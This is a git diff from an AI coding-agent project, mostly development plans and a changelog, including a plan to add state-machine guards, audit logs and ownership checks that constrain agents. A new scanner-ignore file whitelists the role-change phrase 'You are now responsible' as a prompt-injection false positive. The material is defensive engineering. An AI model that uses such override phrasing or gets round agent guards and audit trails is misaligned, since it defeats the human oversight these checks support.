+████████████████████████████░░░░ 78% (14.2 GB / 18.1 GB) +✓ codestral:22b ready + +> /model ollama/codestral:22b +Switched to codestral:22b (local, Ollama) +``` + +## Implementation Order + +1. **Phase 1** — Auto-discovery with OpenAI-compat routing. Biggest user impact, smallest risk. +2. **Phase 3** — Management UX (`/ollama` commands). Valuable even before native API. +3. **Phase 2** — Native `/api/chat` provider. Optimization over OpenAI-compat; do last. + +## Core Changes Summary (minimal) + +| File | Change | +|------|--------| +| `packages/pi-ai/src/types.ts` | Add `"ollama"` to `KnownProvider`, `"ollama-chat"` to `KnownApi` (Phase 2) | +| `packages/pi-ai/src/env-api-keys.ts` | Add `"ollama"` → always returns `"ollama"` placeholder | +| `src/onboarding.ts` | Add `"ollama"` to provider picker | +| `src/wizard.ts` | Add `"ollama"` key mapping (no key required) | + +Everything else lives in `src/resources/extensions/ollama/`. + +## Risks & Mitigations + +| Risk | Mitigation | +|------|------------| +| Ollama not running — startup probe latency | 1.5s timeout; cache result; probe async so it doesn't block TUI paint | +| Model capabilities unknown | Known-model table + `/api/show` fallback + parameter_size estimation | +| Tool calling unreliable on small models | Detect param count; warn on <7B models | +| Ollama API changes between versions | Version detect via `/api/version`; stable endpoints only | +| Conflicts with `models.json` Ollama config | User config always wins; auto-discovered models merge beneath manual config | +| Extension disabled — no impact on core | Extension is additive; disabling removes all Ollama features cleanly | + +## Testing Strategy + +- Unit tests: `ollama-client.ts` with mocked fetch responses +- Unit tests: `ollama-discovery.ts` model capability parsing +- Unit tests: `ollama-provider.ts` message format mapping + NDJSON stream parsing +- Unit tests: `model-capabilities.ts` known model lookups +- Integration test: mock HTTP server simulating Ollama `/api/tags`, `/api/chat`, `/api/pull` +- Manual test: real Ollama instance with llama3.1, qwen2.5-coder, deepseek-r1 + +## Open Questions + +1. **Startup probe** — Probe Ollama on `session_start` (adds ~1.5s if not running) or lazy on first `/model`? **Recommendation: async probe on session_start (non-blocking), eager if `OLLAMA_HOST` is set.** +2. **Auto-start** — Try to launch Ollama if installed but not running? **Recommendation: no — too invasive. Show helpful message in `/ollama` status.** +3. **Vision support** — Support multimodal models (llava, etc.) in Phase 2 native API? **Recommendation: yes, detected via capabilities table.** +4. **Model refresh** — How often to re-probe Ollama for new models? **Recommendation: on `/ollama list`, on `/model` command, and every 5 min (existing TTL).** diff --git a/.plans/onboarding-detection-wizard.md b/.plans/onboarding-detection-wizard.md index 0f6d0044f..5d1e5a2e2 100644 --- a/.plans/onboarding-detection-wizard.md +++ b/.plans/onboarding-detection-wizard.md @@ -134,7 +134,7 @@ Quick filesystem scan (no heavy reads): ### Task 1.4: `isFirstEverLaunch(): boolean` -Returns `true` if `~/.gsd/` doesn't exist or has no `preferences.md`. +Returns `true` if `~/.gsd/` doesn't exist or has no `PREFERENCES.md`. --- @@ -298,7 +298,7 @@ Step 8: Advanced (collapsed by default, expandable) Step 9: Bootstrap .gsd/ structure - Creates .gsd/milestones/ - - Creates .gsd/preferences.md (from wizard answers) + - Creates .gsd/PREFERENCES.md (from wizard answers) - Creates .gitignore entries - Seeds CONTEXT.md with detected project signals - Commits "chore: init gsd" (if commit_docs enabled) diff --git a/.plans/preferences-wizard-completeness.md b/.plans/preferences-wizard-completeness.md index 5709d7f21..bb6a353d0 100644 --- a/.plans/preferences-wizard-completeness.md +++ b/.plans/preferences-wizard-completeness.md @@ -42,7 +42,7 @@ The `/gsd prefs wizard` currently only configures 6 of 18+ preference fields. Us - Added missing keys to `orderedKeys` in `serializePreferencesToFrontmatter()` ### Group 6: Update Template & Docs ✓ -- Updated `templates/preferences.md` with new fields +- Updated `templates/PREFERENCES.md` with new fields - Updated `docs/preferences-reference.md` with budget, notifications, git, hooks ### Group 7: Tests ✓ diff --git a/.plans/single-writer-engine-v3-control-plane.md b/.plans/single-writer-engine-v3-control-plane.md new file mode 100644 index 000000000..ad294ef55 --- /dev/null +++ b/.plans/single-writer-engine-v3-control-plane.md @@ -0,0 +1,396 @@ +# Single-Writer Engine v3: Agent Control Plane +# Plan: State machine guards + actor causation + reversibility +# Created: 2026-03-25 + +--- + +## Background + +v2 gave the engine **write discipline** — agents can't corrupt STATE.md directly, +every mutation goes through the DB, event log is append-only. + +What v2 did NOT give us: **behavioral control**. Agents can still: +- Complete a task twice (silent overwrite) +- Complete a slice with open tasks (if they bypass the slice status check) +- Complete a milestone in any status +- Re-plan already-completed slices/tasks +- Call any tool on any unit regardless of ownership +- Leave no trace of *who* did what or *why* + +This plan bundles three work streams that close those gaps together, since they +share infrastructure (WorkflowEvent schema, DB query surface, handler preconditions). + +--- + +## Work Streams + +### Stream 1 — State Machine Guards (P0) +Add precondition checks to all 8 tool handlers so invalid transitions return an +error instead of silently succeeding. + +### Stream 2 — Actor Identity + Persistent Audit Log (P1) +Extend `WorkflowEvent` with `actor_name` and `trigger_reason`. Flush the +in-process `workflow-logger` buffer to a persistent `.gsd/audit-log.jsonl` +after every tool invocation, so "who did what and why" is durable. + +### Stream 3 — Reversibility + Unit Ownership (P2) +Add `gsd_task_reopen` and `gsd_slice_reopen` tools. Add a unit-ownership +validation layer so an agent can only complete/reopen units it explicitly claimed. + +--- + +## Detailed Task Breakdown + +--- + +### Stream 1: State Machine Guards + +#### S1-T1: Add `getTask`, `getSlice`, `getMilestone` existence helpers to `gsd-db.ts` + +**Files:** `src/resources/extensions/gsd/gsd-db.ts` + +These are read-only DB helpers to confirm an entity exists and return its current +`status` field before any mutation. Each returns `null` if not found. + +```ts +getTask(taskId: string, sliceId: string): { status: string } | null +getSlice(sliceId: string, milestoneId: string): { status: string } | null +getMilestoneById(milestoneId: string): { status: string } | null +``` + +Note: `getSlice` may already exist — check before adding a duplicate. The audit +report references it in `complete-slice.ts` line 207 but only to list tasks. +Need a version that returns the slice row itself. + +--- + +#### S1-T2: Guard `complete-task.ts` — enforce valid transitions + +**File:** `src/resources/extensions/gsd/tools/complete-task.ts` + +Preconditions to add (before the transaction block): +1. `getMilestoneById(milestoneId)` → must exist, must NOT be `"complete"` or `"done"` +2. `getSlice(sliceId, milestoneId)` → must exist, must be `"pending"` or `"in_progress"` +3. `getTask(taskId, sliceId)` → if exists, status must be `"pending"` (not already `"complete"`) + +On failure: return `{ error: "" }` — do NOT throw. + +--- + +#### S1-T3: Guard `complete-slice.ts` — enforce valid transitions + +**File:** `src/resources/extensions/gsd/tools/complete-slice.ts` + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → must exist, status must be `"pending"` or `"in_progress"` (not already `"complete"`) +2. `getMilestoneById(milestoneId)` → must exist, must NOT be `"complete"` +3. All tasks in slice must be `"complete"` (already enforced — keep it, add explicit slice-status check before this) + +--- + +#### S1-T4: Guard `complete-milestone.ts` — enforce valid transitions + +**File:** `src/resources/extensions/gsd/tools/complete-milestone.ts` + +Preconditions to add: +1. `getMilestoneById(milestoneId)` → must exist, status must be `"active"` (not already `"complete"`) +2. Keep existing all-slices-complete check +3. Add deep check: all tasks across all slices must also be `"complete"` (not just slice status) + +--- + +#### S1-T5: Guard `plan-task.ts` — block re-planning completed tasks + +**File:** `src/resources/extensions/gsd/tools/plan-task.ts` + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → must exist, status must NOT be `"complete"` (already blocks planning on a closed slice) +2. If task exists (`getTask`), status must be `"pending"` — block re-planning a `"complete"` task + +--- + +#### S1-T6: Guard `plan-slice.ts` — block re-planning completed slices + +**File:** `src/resources/extensions/gsd/tools/plan-slice.ts` + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → if exists, status must NOT be `"complete"` +2. `getMilestoneById(milestoneId)` → must exist, status must NOT be `"complete"` + +--- + +#### S1-T7: Guard `plan-milestone.ts` — block re-planning completed milestones + +**File:** `src/resources/extensions/gsd/tools/plan-milestone.ts` + +Preconditions to add: +1. If milestone exists (`getMilestoneById`), status must NOT be `"complete"` +2. Validate `depends_on` array: each referenced milestoneId must exist and be `"complete"` before this milestone can be planned + +--- + +#### S1-T8: Guard `reassess-roadmap.ts` — verify completedSliceId is actually complete + +**File:** `src/resources/extensions/gsd/tools/reassess-roadmap.ts` + +Gap: `completedSliceId` is accepted without confirming it is actually `"complete"` status. +Also: no check that milestone is still `"active"` (could reassess after milestone is done). + +Preconditions to add: +1. `getSlice(completedSliceId, milestoneId)` → status must be `"complete"` +2. `getMilestoneById(milestoneId)` → status must be `"active"` + +--- + +#### S1-T9: Guard `replan-slice.ts` — verify blockerTaskId exists and is complete + +**File:** `src/resources/extensions/gsd/tools/replan-slice.ts` + +Gaps: +- `blockerTaskId` is accepted without verifying it exists or is `"complete"` +- No check that slice is still `"in_progress"` (could replan after slice is complete) + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → status must be `"in_progress"` or `"pending"`, NOT `"complete"` +2. `getTask(blockerTaskId, sliceId)` → must exist, status must be `"complete"` + +--- + +### Stream 2: Actor Identity + Persistent Audit Log + +#### S2-T1: Extend `WorkflowEvent` with actor identity and causation fields + +**File:** `src/resources/extensions/gsd/workflow-events.ts` + +Extend the `WorkflowEvent` interface: +```ts +export interface WorkflowEvent { + cmd: string; + params: Record; + ts: string; + hash: string; + actor: "agent" | "system"; + actor_name?: string; // ADD: e.g. "executor-agent-01", "gsd-orchestrator" + trigger_reason?: string; // ADD: e.g. "plan-phase complete", "user invoked gsd_complete_task" + session_id?: string; // ADD: process.env.GSD_SESSION_ID if set +} +``` + +Update `appendEvent` to accept and persist these new optional fields. +Hash computation must remain stable (still hashes only `cmd + params`, not the new fields) +so fork detection isn't broken. + +--- + +#### S2-T2: Update all 8 tool handlers to pass actor identity to `appendEvent` + +**Files:** All 8 handlers in `src/resources/extensions/gsd/tools/` + +Each handler receives its inputs. Add a convention where params can include: +- `actor_name` (optional string) — caller passes their agent identity +- `trigger_reason` (optional string) — caller passes why this action was triggered + +If not provided, default to `actor_name: "agent"`, `trigger_reason: undefined`. + +Handlers pass these through to `appendEvent`. + +The tool schemas (in the MCP tool definitions) should expose `actor_name` and +`trigger_reason` as optional string params so agents can self-identify. + +--- + +#### S2-T3: Persist `workflow-logger` to `.gsd/audit-log.jsonl` + +**File:** `src/resources/extensions/gsd/workflow-logger.ts` + +Current behavior: `_buffer` is in-process memory, drained per-unit and dropped. +This means errors/warnings disappear across context resets. + +Change: After `_push()` writes to the in-process buffer, also append the entry +to `.gsd/audit-log.jsonl` (using `appendFileSync`). This requires the basePath +to be available — either pass it as a module-level setter (`setLogBasePath(path)`) +called at engine init, or accept it as a param on `logWarning`/`logError`. + +The audit log format should match `LogEntry` serialized as JSON + newline, +consistent with `event-log.jsonl`. + +--- + +#### S2-T4: Add `readAuditLog` helper to `workflow-logger.ts` + +**File:** `src/resources/extensions/gsd/workflow-logger.ts` + +Expose a read function so the auto-loop and diagnostics can surface persistent +audit entries without replaying the event log: + +```ts +export function readAuditLog(basePath: string): LogEntry[] +``` + +--- + +### Stream 3: Reversibility + Unit Ownership + +#### S3-T1: Add `updateTaskStatus` and `updateSliceStatus` DB helpers + +**File:** `src/resources/extensions/gsd/gsd-db.ts` + +If they don't already exist (check first): +```ts +updateTaskStatus(taskId: string, sliceId: string, status: string): void +updateSliceStatus(sliceId: string, milestoneId: string, status: string): void +``` + +These are the write primitives needed by reopen tools. + +--- + +#### S3-T2: Implement `gsd_task_reopen` tool handler + +**New file:** `src/resources/extensions/gsd/tools/reopen-task.ts` + +Logic: +1. Validate `taskId`, `sliceId`, `milestoneId` are non-empty strings +2. `getTask(taskId, sliceId)` → must exist, status must be `"complete"` (can't reopen what isn't closed) +3. `getSlice(sliceId, milestoneId)` → must exist, status must NOT be `"complete"` (can't reopen a task inside a closed slice — too late) +4. `getMilestoneById(milestoneId)` → must exist, status must NOT be `"complete"` +5. In a transaction: `updateTaskStatus(taskId, sliceId, "pending")` +6. Append event: `cmd: "reopen_task"`, include `actor_name`, `trigger_reason` +7. Invalidate state cache + render projections + +--- + +#### S3-T3: Implement `gsd_slice_reopen` tool handler + +**New file:** `src/resources/extensions/gsd/tools/reopen-slice.ts` + +Logic: +1. Validate `sliceId`, `milestoneId` +2. `getSlice(sliceId, milestoneId)` → must exist, status must be `"complete"` +3. `getMilestoneById(milestoneId)` → must NOT be `"complete"` +4. In a transaction: `updateSliceStatus(sliceId, milestoneId, "in_progress")` + set all tasks back to `"pending"` +5. Append event: `cmd: "reopen_slice"` +6. Invalidate state cache + render projections + +--- + +#### S3-T4: Add unit ownership claim/check mechanism + +**New file:** `src/resources/extensions/gsd/unit-ownership.ts` + +Lightweight JSON file at `.gsd/unit-claims.json` mapping unit IDs to agent names: +```json +{ + "M01/S01/T01": { "agent": "executor-01", "claimed_at": "2026-03-25T..." }, + "M01/S01": { "agent": "executor-01", "claimed_at": "2026-03-25T..." } +} +``` + +Functions: +```ts +claimUnit(basePath, unitKey, agentName): void // atomic write +releaseUnit(basePath, unitKey): void +getOwner(basePath, unitKey): string | null +``` + +`unitKey` format: `"//"` for tasks, `"/"` for slices. + +--- + +#### S3-T5: Wire ownership check into `complete-task` and `complete-slice` + +**Files:** `complete-task.ts`, `complete-slice.ts` + +If `actor_name` is provided AND `.gsd/unit-claims.json` exists AND the unit is claimed: +- Verify `actor_name` matches the registered owner +- If mismatch: return `{ error: "Unit is owned by , not " }` +- If no claim file / unit is unclaimed: allow the operation (opt-in ownership) + +Ownership is enforced only when claims are present, keeping the feature opt-in. + +--- + +## Files Changed Summary + +| File | Change Type | +|------|-------------| +| `gsd-db.ts` | Add `getTask`, `getMilestoneById` existence helpers; add `updateTaskStatus`, `updateSliceStatus` | +| `workflow-events.ts` | Extend `WorkflowEvent` with `actor_name`, `trigger_reason`, `session_id` | +| `workflow-logger.ts` | Add persistent flush to `.gsd/audit-log.jsonl`; add `setLogBasePath`; add `readAuditLog` | +| `tools/complete-task.ts` | State machine guards + ownership check + actor passthrough | +| `tools/complete-slice.ts` | State machine guards + ownership check + actor passthrough | +| `tools/complete-milestone.ts` | State machine guards + deep task check | +| `tools/plan-task.ts` | Block re-planning complete tasks | +| `tools/plan-slice.ts` | Block re-planning complete slices | +| `tools/plan-milestone.ts` | Block re-planning complete milestones + depends_on validation | +| `tools/reassess-roadmap.ts` | Verify completedSliceId status + milestone status check | +| `tools/replan-slice.ts` | Verify blockerTaskId exists + slice status check | +| `tools/reopen-task.ts` | NEW — gsd_task_reopen handler | +| `tools/reopen-slice.ts` | NEW — gsd_slice_reopen handler | +| `unit-ownership.ts` | NEW — claim/release/check ownership | + +--- + +## Execution Order (Dependencies) + +``` +S1-T1 (DB helpers) + └── S1-T2 (complete-task guards) + └── S1-T3 (complete-slice guards) + └── S1-T4 (complete-milestone guards) + └── S1-T5 (plan-task guards) + └── S1-T6 (plan-slice guards) + └── S1-T7 (plan-milestone guards) + └── S1-T8 (reassess-roadmap guards) + └── S1-T9 (replan-slice guards) + └── S3-T1 (updateTask/SliceStatus helpers) ── S3-T2, S3-T3 + +S2-T1 (WorkflowEvent schema) + └── S2-T2 (handler actor passthrough) + +S2-T3 (audit-log flush) + └── S2-T4 (readAuditLog) + +S3-T4 (unit-ownership.ts) + └── S3-T5 (wire into complete-task/slice) +``` + +Parallelizable: +- All of Stream 1 (S1-T2 through S1-T9) can run in parallel once S1-T1 is done +- Stream 2 and Stream 3 are fully independent of Stream 1 + +--- + +## What Success Looks Like + +After this phase: + +1. **Double-complete** → returns `{ error: "Task T01 is already complete" }` instead of silently overwriting +2. **Complete slice with open tasks** → still blocked (was already caught), plus slice status guard added +3. **Re-plan closed work** → returns `{ error: "Cannot re-plan: slice S01 is already complete" }` +4. **Wrong agent completes task** → returns `{ error: "Unit M01/S01/T01 is owned by executor-01, not executor-02" }` +5. **Post-mortem** → `.gsd/audit-log.jsonl` has full trace with actor_name + trigger_reason across context resets +6. **Oops recovery** → `gsd_task_reopen` / `gsd_slice_reopen` without manual SQL surgery +7. **depends_on enforcement** → cannot plan M02 if M01 is not yet complete + +--- + +## Decisions + +1. **Ownership: opt-in** — enforced only when `.gsd/unit-claims.json` exists. Zero breaking change for existing workflows; teams adopt incrementally. + +2. **Slice reopen: reset all tasks to `"pending"`** — simpler invariant. If you're reopening a slice, you're re-doing the work. Partial resets create ambiguous state. + +3. **`trigger_reason`: caller-provided** — agents know *why* they acted; the engine can only know *what* was called. Default to `undefined` if not passed. + +4. **Session ID: engine-generated** — UUID generated once at engine startup, stored in module state in `workflow-events.ts`. No reliance on agents setting env vars correctly. + +5. **Idempotency: fix in this phase** — convert `insertAssessment` and `insertReplanHistory` to upserts (keyed on `milestoneId+sliceId` and `milestoneId+sliceId+ts` respectively). Accumulating duplicate records on retry is a bug, not a feature. + +### Additional task from decision 5: +#### S1-T10: Convert `insertAssessment` and `insertReplanHistory` to upserts + +**File:** `src/resources/extensions/gsd/gsd-db.ts` + +- `insertAssessment`: upsert keyed on `(milestone_id, completed_slice_id)` — one assessment per completed slice per milestone +- `insertReplanHistory`: upsert keyed on `(milestone_id, slice_id, blocker_task_id)` — one replan record per blocker per slice diff --git a/.prompt-injection-scanignore b/.prompt-injection-scanignore new file mode 100644 index 000000000..b6cc73a03 --- /dev/null +++ b/.prompt-injection-scanignore @@ -0,0 +1,2 @@ +# False positives in GSD prompt templates — these are legitimate LLM instructions, not injection +src/resources/extensions/gsd/prompts/doctor-heal.md:You are now responsible diff --git a/CHANGELOG.md b/CHANGELOG.md index b67679841..6abef7517 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,1009 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/). ## [Unreleased] +## [2.67.0] - 2026-04-09 + +### Added +- **context**: implement R005 decision scope cascade and derive scope from slice metadata +- **M005**: Tiered Context Injection - relevance-scoped context with 65%+ reduction + +### Fixed +- **test**: align auto-loop test timers with updated session timeout +- **gsd**: repair CI after branch split +- **gsd**: repair CI after branch split +- **gsd**: repair CI after branch split +- **gsd**: fail closed for discussion gate enforcement +- **gsd**: harden auto merge recovery and session safety +- **gsd**: repair overlay, shortcut, and widget surfaces +- **gsd**: prevent stale workflow reconcile state writes +- **gsd**: align prompt contracts and validation flow +- **pi-tui**: harden input parsing and editor focus behavior +- **remote-questions**: cancel local TUI when remote answer wins the race +- **auto**: increase session timeout to 120s and treat timeout as recoverable pause (#3767) +- **ui**: apply anthropic-api display name to all model/provider UI surfaces +- **ui**: display 'anthropic-api' in GSD preferences wizard provider list +- **remote-questions**: race local TUI against remote channel instead of remote-only routing +- **ui**: display 'anthropic-api' in model selector to distinguish from claude-code +- **gates**: add mechanical enforcement for discussion question gates +- **prompts**: harden non-bypassable gates and exclude dot-folders from scanning +- **gsd**: ignore filename headings in parsePlan +- **providers**: match 'out of extra usage' error and respect claude-code provider in model resolution (#3772) +- **pi-ai**: recover XML parameters trapped in JSON strings +- **retry**: guard claude-code fallback to anthropic provider only +- **providers**: route Anthropic subscription users through Claude Code CLI (#3772) +- **claude-code**: use native Windows claude lookup +- **gsd**: suppress repeated preferences section warnings +- **gsd**: normalize described expected output paths +- **auto**: resilient transient error recovery — defer to Core RetryHandler and fix cmdCtx race + +## [2.66.1] - 2026-04-08 + +### Fixed +- **pi-tui**: revert contentCursorRow, use hardwareCursorRow as movement baseline +- **pi-tui**: use contentCursorRow for render movement baseline instead of cursorRow +- **gsd**: add logWarning to empty catch block in orphaned worktree cleanup +- **gsd**: add consecutiveFinalizeTimeouts to LoopState in journal tests +- **gsd**: add escalation and unit-detach guards to finalize timeout handlers +- **gsd**: add timeout guard around postUnitPreVerification to prevent auto-loop hang +- **gsd**: OS-specific keyboard shortcut hints via formatShortcut helper +- **subagent**: support list-style tools frontmatter +- clear autocomplete rows from content bottom +- parse annotated pre-exec file paths +- **gsd**: add orphaned milestone branch audit at auto-mode bootstrap + +## [2.66.0] - 2026-04-08 + +### Added +- **gsd**: add fast path for queued milestone discussion +- **gsd**: add /gsd show-config command +- **reactive**: graph diagnostics and subagent_model config +- **dispatch**: parallel research slices and parallel milestone validation +- **parallel**: worker model override for parallel milestone workers + +### Fixed +- **gsd**: validate depth verification answer before unlocking write-gate +- **gsd**: revert unknown artifact check to warn-and-proceed +- **gsd**: add missing cmd field to test base WorkflowEvent +- **gsd**: address remaining adversarial review findings for wave 3 +- **gsd**: detect concurrent event log growth during reconcile +- **gsd**: address adversarial review findings for wave 3 +- **gsd**: address adversarial review findings for wave 2 +- **gsd**: address adversarial review findings for wave 1 +- **gsd**: WAL-safe migration backup + stronger regression tests +- **gsd**: consistency and cleanup (wave 5/5) +- **gsd**: write safety — atomic writes and randomized tmp paths (wave 4/5) +- **gsd**: session and recovery robustness (wave 3/5) +- **gsd**: event log and reconciliation robustness (wave 2/5) +- **gsd**: critical state machine data integrity fixes (wave 1/5) +- **gsd**: critical state machine data integrity fixes (wave 1/5) +- **gsd**: remove ecosystem research stub and address adversarial review +- **gsd**: suppress model change notification in auto-mode unless verbose +- **gsd**: exclude task.files from checkTaskOrdering to prevent false positives +- **state**: skip ghost check for queued milestones in registry build +- **ci**: replace empty catch blocks and raw stderr with logWarning +- **logging**: add debugLog to empty catch in reopen-milestone +- **state-machine**: 9 resilience fixes + 86 regression tests (#3161) +- **gsd**: add incremental persistence to discuss prompts +- replace empty catch with logWarning for silent-catch-diagnostics test +- **test**: escape regex metacharacters in skip-by-preference pattern test +- **test**: search for numbered step definitions in prompt ordering test +- **test**: update notes loop test for notesVisible guard behavior +- **test**: update action count for note captures now included in results +- **test**: remove extraneous test file from wrong branch +- **test**: update worktree sync tests to use separate milestone IDs +- **gsd**: use valid LogComponent type for stale branch guard warning +- **test**: update rogue detection test for auto-remediation behavior +- **test**: update stuck-planning test to expect executing after reconciliation +- **test**: update file path consistency tests for inputs-only checking +- **test**: add CONTEXT file to queued milestone ghost detection test +- **test**: update needs-remediation test to expect validating-milestone phase +- **gsd**: import all-done milestones as complete during DB migration +- **gsd**: allow milestone completion when validation skipped by preference +- **gsd**: set slice sequence at all three insertion sites +- **gsd**: four prompt/runtime fixes for completion and session stability +- **gsd**: default insertMilestone status to queued instead of active +- **gsd**: suppress repeated frontmatter YAML parse warnings +- **gsd**: normalize list inputs in complete-task + fix roadmap dep parsing +- **gsd**: open DB before status derivation + respect isolation:none in quick +- **gsd**: add .bg-shell/ to baseline gitignore patterns +- **tui**: prevent Enter key infinite loop in interview notes mode +- **provider**: handle Enter key to initiate auth setup in provider manager +- **gsd**: cap run-uat dispatch attempts to prevent infinite replay loop +- **mcp**: use createRequire to resolve SDK wildcard subpath imports +- **gsd**: mark note captures as executed in executeTriageResolutions +- **gsd**: validate main_branch preference exists before using in merge +- **gsd**: handle deleted cwd in projectRoot to prevent ENOENT crash +- **gsd**: skip current milestone in syncWorktreeStateBack to prevent merge conflicts +- **gsd**: add structuredQuestionsAvailable conditional to slice discuss +- **gsd**: restore full tool set after discuss flow scoping +- **gsd**: tighten verifyExpectedArtifact to prevent rogue-write false positives +- **gsd**: add verification gate to complete-slice tool +- **gsd**: fix pre-execution-checks false positives from backticks and task.files +- **gsd**: stop renderAllProjections from overwriting authoritative PLAN.md +- **gsd**: auto-checkout to main when isolation:none finds stale milestone branch +- **gsd**: auto-remediate stale slice DB status when SUMMARY exists on disk +- **gsd**: open DB on demand in gsd_milestone_status for non-auto sessions +- **gsd**: detect phantom milestones from abandoned gsd_milestone_generate_id +- **gsd**: force re-validation when verdict is needs-remediation +- **gsd**: exclude closed slices from findMissingSummaries check +- **gsd**: recover from stale lockfile after crash or SIGKILL +- **gsd**: add createdAt timestamp and 30s age guard to staleness check +- **gsd**: clear stale pendingAutoStart after /clear interrupts discussion +- **gsd**: suppress misleading warnings for expected ENOENT/EISDIR conditions +- **gsd**: extract real error from message content when errorMessage is useless +- **gsd**: extract real error from message content when errorMessage is useless +- **gsd**: show accurate pause message for queued-user-message skip +- **gsd**: treat queued-user-message skip as non-retryable interruption +- **gsd**: recognize "Not provided." default in isVerificationNotApplicable +- **gsd**: discoverManifests skips symlinked extension directories +- **gsd**: recognize "Not provided." default in isVerificationNotApplicable +- **gsd**: reconcile plan-file tasks into DB when planner skips persistence (#3600) +- **gsd**: use isClosedStatus() in dispatch guard instead of raw complete check +- **browser-tools**: make sharp an optional lazy dependency +- **gsd**: pass required arguments in defer-milestone-stamp test +- **gsd**: replace remaining empty catch with logWarning +- **gsd**: use logWarning instead of raw stderr in catch blocks +- **gsd**: log error instead of empty catch in STATE.md rebuild +- **gsd**: log error instead of empty catch in skip_slice +- **gsd**: cast milestone classification to string for type safety +- **gsd**: treat zero-slice roadmap as pre-planning in guided flow +- **gsd**: rebuild STATE.md after skip-slice and strengthen rethink prompt +- **gsd**: use main_branch preference in worktree creation +- **gsd**: stamp defer and milestone captures as executed after triage +- **tui**: treat absolute file paths as plain text, not commands +- **tui**: break infinite re-render loop for images in cmux +- **gsd**: rebuild STATE.md before guided-flow dispatch +- **gsd**: defer queued shells in active milestone selection +- **retry**: prevent 429 quota cascade and 30-min lockout +- **gsd**: add fastPathInstruction to buildDiscussMilestonePrompt loadPrompt call + +### Changed +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task + +## [2.65.0] - 2026-04-07 + +### Added +- **gsd**: persistent notification panel with TUI overlay, widget, and web API +- **gsd**: wire blocking behavior and strict mode for enhanced verification +- **gsd**: add post-execution cross-task consistency checks +- **gsd**: add pre-execution plan verification checks + +### Fixed +- **gsd**: wrap long notification messages and fit overlay to content +- **gsd**: remove background color from backdrop, fix message truncation +- **gsd**: restore consistent overlay height to prevent ghost artifacts +- **gsd**: improve notification overlay backdrop and content-fit sizing +- **gsd**: only unlink notification lock when owned, prevent foreign lock deletion +- **gsd**: add backdrop dimming and viewport padding to notification overlay +- **gsd**: add intent + phase guards to resume context fallback (#3615) +- **gsd**: inject task context for unstructured resume prompts (#3615) +- **pi-coding-agent**: restore extension tools after session switch (#3616) +- **agent-loop**: schema overload cap ignores bash execution errors (#3618) +- **bg-shell**: prevent signal handler accumulation + cap alert queue +- **gsd**: coerce plain-string provides field to array in complete-slice (#3585) +- address PR #3468 review findings +- **gsd**: persist autoStartTime across session resume so elapsed timer survives /exit +- **gsd**: add enhanced_verification preferences to mergePreferences +- **headless**: treat discuss and plan as multi-turn commands + +### Changed +- **interactive**: cap rendered chat components + kill orphan descendants +- **tui**: render-skip, frame isolation, Text cache guard, dispose + +## [2.64.0] - 2026-04-06 + +### Added +- **gsd**: add LLM safety harness for auto-mode damage control +- **ollama**: native /api/chat provider with full option exposure +- **parallel**: slice-level parallelism with dependency-aware dispatch (#3315) +- **mcp-client**: add OAuth auth provider for HTTP transport (#3295) + +### Fixed +- **ui**: remove 200-column cap on welcome screen width +- address adversarial review findings for #3576 +- **gsd**: replace hardcoded agent skill paths with dynamic resolution (#3575) +- **headless**: sync resources and use agent dir for query +- **cli**: show latest version and bypass npm cache in update check +- **gsd**: follow CONTRIBUTING standards for #3565 +- **gsd**: address Codex adversarial review findings for #3565 +- **gsd**: coerce string arrays to objects in complete-slice/task tools (#3565) +- **gsd**: harden flat-rate routing guard against alias/resolution gaps +- **pi-coding-agent**: register models.json providers and await Ollama probe in headless mode +- **ollama**: use apiKey auth mode to avoid streamSimple crash +- **gsd**: disable dynamic model routing for flat-rate providers +- **gsd**: address Codex adversarial review findings +- **gsd**: prevent LLM from querying gsd.db directly via bash (#3541) +- **gsd**: seed requirements table from REQUIREMENTS.md on first update +- **gsd**: inject S##-CONTEXT.md from slice discussion into all prompt builders +- **cli**: guard model re-apply against session restore and async rejection +- **pi-coding-agent**: resolve model fallback race that ignores configured provider (#3534) +- **detection**: add xcodegen and Xcode bundle support to project detection (#1882) +- **perf**: share jiti module cache across extension loads (#3308) +- **resource-sync**: prune removed bundled subdirectory extensions on upgrade (#1972) +- recognize U+2705 checkmark emoji as completion marker in prose roadmaps (#1897) +- **web**: use safePackageRootFromImportUrl for cross-platform package root (#1881) (#1893) +- isolate CmuxClient stdio to prevent TUI hangs in CMUX (#3306) +- worktree health check walks parent dirs for monorepo support (#3313) +- **gsd**: promote milestone status from queued to active in plan-milestone (#3317) +- **worktree**: correct merge failure notification command from /complete-milestone to /gsd dispatch complete-milestone (#1901) +- detect and block Gemini CLI OAuth tokens used as API keys (#3296) +- **auto**: break retry loop on tool invocation errors (malformed JSON) (#3298) +- **git**: use git add -u in symlink .gsd fallback to prevent hang (#3299) +- handle complete-slice context exhaustion to unblock downstream slices (#3300) +- cap consecutive tool validation failures to prevent stuck-loop (#3301) +- make enrichment tool params optional for limited-toolcall models (#3302) +- add filesystem safety guard to complete-slice.md (#3304) +- **extensions**: use bundledExtensionKeys for conflict detection instead of broken path heuristic (#3305) +- scope tools during discuss flows to prevent grammar overflow (#3307) +- **preferences**: warn on silent parse failure for non-frontmatter files (#3310) +- track remote-questions in managed-resources manifest (#3312) +- **auto**: add timeout guard for postUnitPostVerification in runFinalize (#3314) +- **gsd**: handle large markdown parameters in complete-milestone JSON parsing (#3316) +- **metrics**: deduplicate idle-watchdog entries and fix forensics false-positives (#1973) +- prevent milestone/slice artifact rendering corruption (#3293) +- **doctor**: strip --fix flag before positional parse (#1919) (#1926) +- resolve external-state worktree DB path (#2952) (#3303) +- **gsd**: worktree teardown path validation prevents data loss (#3311) +- prevent auto-mode from dispatching deferred slices (#3309) +- preserve completed slice status on plan-milestone re-plan (#3318) +- reopen DB on cold resume, recognize heavy check mark (#3319) +- dashboard model label shows dispatched model, not stale previous unit (#3320) + +### Changed +- **gsd**: remove copyright line from test file +- **gsd**: trim promptGuidelines to 1 line to reduce per-turn token cost +- **web**: consolidate subprocess boilerplate into shared runner (#1899) + +## [2.63.0] - 2026-04-05 + +### Added +- **mcp-server**: add 6 read-only tools for project state 